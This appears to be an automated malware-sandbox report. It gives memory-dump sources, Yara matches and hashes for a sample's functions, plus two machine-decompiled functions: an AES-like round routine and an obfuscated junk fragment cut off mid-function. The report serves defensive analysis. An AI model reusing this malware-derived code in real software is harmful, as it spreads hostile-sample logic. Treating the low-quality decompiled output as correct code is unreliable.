                                                                                                                                                              0x0041b852
                                                                                                                                                              0x0041b858
                                                                                                                                                              0x0041b85a
                                                                                                                                                              0x0041b860
                                                                                                                                                              0x0041b867
                                                                                                                                                              0x0041b874
                                                                                                                                                              0x0041b8a2
                                                                                                                                                              0x0041b8b1
                                                                                                                                                              0x0041b8b7
                                                                                                                                                              0x0041b8bd
                                                                                                                                                              0x0041b8c3
                                                                                                                                                              0x0041b8c4
                                                                                                                                                              0x0041b8d6
                                                                                                                                                              0x0041b8dd
                                                                                                                                                              0x0041b8e3
                                                                                                                                                              0x0041b8e9
                                                                                                                                                              0x0041b8ec
                                                                                                                                                              0x0041b8f6
                                                                                                                                                              0x0041b8fc
                                                                                                                                                              0x0041b90d
                                                                                                                                                              0x0041b91b
                                                                                                                                                              0x0041b924
                                                                                                                                                              0x0041b92b
                                                                                                                                                              0x0041b931
                                                                                                                                                              0x0041b94f
                                                                                                                                                              0x0041b955
                                                                                                                                                              0x0041b95b
                                                                                                                                                              0x0041b961
                                                                                                                                                              0x0041b96b
                                                                                                                                                              0x0041b971
                                                                                                                                                              0x0041b977
                                                                                                                                                              0x0041b97f
                                                                                                                                                              0x0041b986
                                                                                                                                                              0x0041b98c
                                                                                                                                                              0x0041b993
                                                                                                                                                              0x0041b999
                                                                                                                                                              0x0041b99a
                                                                                                                                                              0x0041b99a
                                                                                                                                                              0x0041b9a0
                                                                                                                                                              0x0041b9a6
                                                                                                                                                              0x0041b9ad
                                                                                                                                                              0x0041b9b3
                                                                                                                                                              0x0041b9b9
                                                                                                                                                              0x0041b9bf
                                                                                                                                                              0x0041b9c5
                                                                                                                                                              0x0041b9cb
                                                                                                                                                              0x0041b9d2
                                                                                                                                                              0x0041b9d8
                                                                                                                                                              0x0041b9de
                                                                                                                                                              0x0041b9e4
                                                                                                                                                              0x0041b9ea
                                                                                                                                                              0x0041b9f0
                                                                                                                                                              0x0041b9f6
                                                                                                                                                              0x0041b9c5
                                                                                                                                                              0x0041b867
                                                                                                                                                              0x0041b80b
                                                                                                                                                              0x0041b792
                                                                                                                                                              0x0041b716
                                                                                                                                                              0x0041b6ab
                                                                                                                                                              0x0041b640
                                                                                                                                                              0x0041b607
                                                                                                                                                              0x00000000

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f56c62f01ed3e6b4538bfc7011c8da014034bbe37fd78287c018da4d0801d313
                                                                                                                                                              • Instruction ID: 3d0a6c0eeed7f7b8ccd391841a810113cf742a0ef44624ce4bf49e8f1a2e5492
                                                                                                                                                              • Opcode Fuzzy Hash: f56c62f01ed3e6b4538bfc7011c8da014034bbe37fd78287c018da4d0801d313
                                                                                                                                                              • Instruction Fuzzy Hash: BD329832919391CFE716DF38C9CAB423FB6F356324B08824EC8A297196D7782555CF89
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009F35DA, Relevance: .5, Instructions: 483COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c9b914c5141a6fd7e4ae3d1e80c81008b0654eec0665b6df5c091392f089244c
                                                                                                                                                              • Instruction ID: 7d9537cd4382ef52c6c6e85eaf469fd3f145f55d570f42ea1ea6326cb41fa74d
                                                                                                                                                              • Opcode Fuzzy Hash: c9b914c5141a6fd7e4ae3d1e80c81008b0654eec0665b6df5c091392f089244c
                                                                                                                                                              • Instruction Fuzzy Hash: F0128C71A00209DFDB15CF59C880AB9B7F5FF88314F248169E6569B391D778EE82CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0097286D, Relevance: .5, Instructions: 460COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 071e6d6dabd9bff7968d24f6678328d9a7582728228aa13fe8ea4ff1f057fa9c
                                                                                                                                                              • Instruction ID: 8e66be3860e28bfdeaaa0bef6c8d35c61bd1a1f17b99b83affc71db55089defe
                                                                                                                                                              • Opcode Fuzzy Hash: 071e6d6dabd9bff7968d24f6678328d9a7582728228aa13fe8ea4ff1f057fa9c
                                                                                                                                                              • Instruction Fuzzy Hash: DF02C37191012A9BCF34DF58C888BB9B3B8FF58701F5481EAE949A7291E7348ED1DB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402FB0, Relevance: .4, Instructions: 435COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 26%
                                                                                                                                                              			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}



















                                                                                                                                                              0x00402fb0
                                                                                                                                                              0x00402fbf
                                                                                                                                                              0x00402fc8
                                                                                                                                                              0x00402fd6
                                                                                                                                                              0x00402fda
                                                                                                                                                              0x00402fe3
                                                                                                                                                              0x00402ff4
                                                                                                                                                              0x00402ff7
                                                                                                                                                              0x00402ffc
                                                                                                                                                              0x00403005
                                                                                                                                                              0x00403013
                                                                                                                                                              0x00403018
                                                                                                                                                              0x00403021
                                                                                                                                                              0x00403031
                                                                                                                                                              0x00403051
                                                                                                                                                              0x00403054
                                                                                                                                                              0x00403066
                                                                                                                                                              0x0040306b
                                                                                                                                                              0x00403080
                                                                                                                                                              0x0040309d
                                                                                                                                                              0x004030a0
                                                                                                                                                              0x004030b1
                                                                                                                                                              0x004030c6
                                                                                                                                                              0x004030e6
                                                                                                                                                              0x004030e9
                                                                                                                                                              0x004030fb
                                                                                                                                                              0x00403119
                                                                                                                                                              0x00403136
                                                                                                                                                              0x00403139
                                                                                                                                                              0x0040314b
                                                                                                                                                              0x00403160
                                                                                                                                                              0x00403166
                                                                                                                                                              0x0040316e
                                                                                                                                                              0x0040316f
                                                                                                                                                              0x00403172
                                                                                                                                                              0x00403180
                                                                                                                                                              0x00403190
                                                                                                                                                              0x004031a2
                                                                                                                                                              0x004031b4
                                                                                                                                                              0x004031d0
                                                                                                                                                              0x004031e3
                                                                                                                                                              0x004031f0
                                                                                                                                                              0x00403201
                                                                                                                                                              0x00403218
                                                                                                                                                              0x0040323a
                                                                                                                                                              0x0040323d
                                                                                                                                                              0x0040324e
                                                                                                                                                              0x00403269
                                                                                                                                                              0x00403280
                                                                                                                                                              0x00403283
                                                                                                                                                              0x00403295
                                                                                                                                                              0x0040329d
                                                                                                                                                              0x004032b2
                                                                                                                                                              0x004032cf
                                                                                                                                                              0x004032d2
                                                                                                                                                              0x004032e3
                                                                                                                                                              0x00403307
                                                                                                                                                              0x00403317
                                                                                                                                                              0x0040331a
                                                                                                                                                              0x0040332c
                                                                                                                                                              0x00403344
                                                                                                                                                              0x00403347
                                                                                                                                                              0x0040335a
                                                                                                                                                              0x00403367
                                                                                                                                                              0x00403379
                                                                                                                                                              0x00403391
                                                                                                                                                              0x004033b4
                                                                                                                                                              0x004033b7
                                                                                                                                                              0x004033c9
                                                                                                                                                              0x004033de
                                                                                                                                                              0x004033e4
                                                                                                                                                              0x004033e4
                                                                                                                                                              0x004033e7
                                                                                                                                                              0x004033e7
                                                                                                                                                              0x00403180
                                                                                                                                                              0x0040344b
                                                                                                                                                              0x00403454
                                                                                                                                                              0x00403462
                                                                                                                                                              0x004034c0
                                                                                                                                                              0x004034c9
                                                                                                                                                              0x004034d7
                                                                                                                                                              0x00403539
                                                                                                                                                              0x00403542
                                                                                                                                                              0x0040354f
                                                                                                                                                              0x00403552
                                                                                                                                                              0x0040359e
                                                                                                                                                              0x004035aa
                                                                                                                                                              0x004035b3
                                                                                                                                                              0x004035c0
                                                                                                                                                              0x004035c7

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                              • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                                                                                                                                              • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                              • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009C2FDC, Relevance: .4, Instructions: 400COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4f347b105eff87d5beb93a7c04eee01ec6b5776d5fa876a243089188302b3535
                                                                                                                                                              • Instruction ID: e0c40b575b5e0d98bf787f141f6a7056bbf47035d4a03d7d66180f223a83bf91
                                                                                                                                                              • Opcode Fuzzy Hash: 4f347b105eff87d5beb93a7c04eee01ec6b5776d5fa876a243089188302b3535
                                                                                                                                                              • Instruction Fuzzy Hash: 26E1A172A502069BDB14CFA4C881BBEB7F6FB94304F19C42AE855A7341E778E941CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009F2622, Relevance: .4, Instructions: 398COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: fc0842385e136684976ce35a1c980046c33a3a6b69f60596a62e34a4ed80e2f0
                                                                                                                                                              • Instruction ID: a1e24377a11fcb7664bb88c495529469661d7ff1bc4c28ed19d3d9817c65466c
                                                                                                                                                              • Opcode Fuzzy Hash: fc0842385e136684976ce35a1c980046c33a3a6b69f60596a62e34a4ed80e2f0
                                                                                                                                                              • Instruction Fuzzy Hash: C1E1F6302146598FD728CF15C1A07B2B7E1AF45354F24885EEAE68F292D338E896EB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009E49F5, Relevance: .4, Instructions: 376COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f91e6762bee57ddbb51b47a33f6ef289169f5150f9682f86f6c6b855d3bc75b3
                                                                                                                                                              • Instruction ID: 9e20b9fd952e6994ab90b495e4fdc9b815ed176117fd54d300189721f020bd8a
                                                                                                                                                              • Opcode Fuzzy Hash: f91e6762bee57ddbb51b47a33f6ef289169f5150f9682f86f6c6b855d3bc75b3
                                                                                                                                                              • Instruction Fuzzy Hash: E3D123759042C59EDB26CFAAC844BFEB7F5EF04314F18846AD5D2AB191D378AC85CB10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0095C7BC, Relevance: .3, Instructions: 333COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 234a27139712583cd2af6c2029f750265ec0913becc57be54db64f40c30c983b
                                                                                                                                                              • Instruction ID: 68ed8b70f4e9504cb7c4549f2afaf4ddb3f22c9d2b80d469c9ebfb5a08a64eda
                                                                                                                                                              • Opcode Fuzzy Hash: 234a27139712583cd2af6c2029f750265ec0913becc57be54db64f40c30c983b
                                                                                                                                                              • Instruction Fuzzy Hash: 21C12570509266EFDB24CF25C984BBBBBF8EF46300F144459E9878B641D378A845EBE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041BFCC, Relevance: .3, Instructions: 295COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E0041BFCC(void* __eax, signed int __ebx, signed int __ecx, signed int __edi) {
				signed int _t38;
				signed int _t49;
				signed int _t63;
				signed int _t70;
				signed int _t76;
				signed int _t81;
				signed int _t87;
				signed int _t89;
				signed int _t93;
				signed int _t94;
				signed int _t101;

				_t51 = __ebx;
				_pop(_t93);
				asm("out 0xd7, eax");
				 *0x53998633 =  *0x53998633 + _t93;
				 *0x7cb6ea0f =  *0x7cb6ea0f << 0x9e;
				asm("sbb al, [0x6af848b7]");
				_t63 = __ecx ^ 0x0000001c;
				_push(__ebx);
				 *0x3c9ceab6 =  *0x3c9ceab6 >> 0xb9;
				asm("adc esp, 0x3a17b32b");
				_t68 =  *0x2fc90769 * 0x4b00;
				_push(0xa79cb805);
				_t38 = __eax - 0xf6231c25;
				_t81 = (__edi &  *0x60a85a1d) +  *0xe1e31f0d;
				if(_t81 < 0) {
					_t81 = _t81 &  *0x5748c09;
					 *0xb51d6b12 =  *0xb51d6b12 ^ _t68;
					_t101 =  *0xeae9dd7d * 0x77f6 - 1;
					asm("adc esp, [0x2a2b2d3b]");
					asm("sbb ebp, 0xfb937d94");
					 *0x3fbe6aa8 =  *0x3fbe6aa8 ^ _t68;
					_t63 = _t63 | 0x0000002a;
					if(_t63 <= 0) {
						goto L1;
					} else {
						 *0x8ea2c6cb =  *0x8ea2c6cb << 0x37;
						asm("sbb [0xe40ca495], edx");
						 *0x25d7e2ce =  *0x25d7e2ce + _t93;
						 *0x268a70d6 =  *0x268a70d6 &  *0xe7381876;
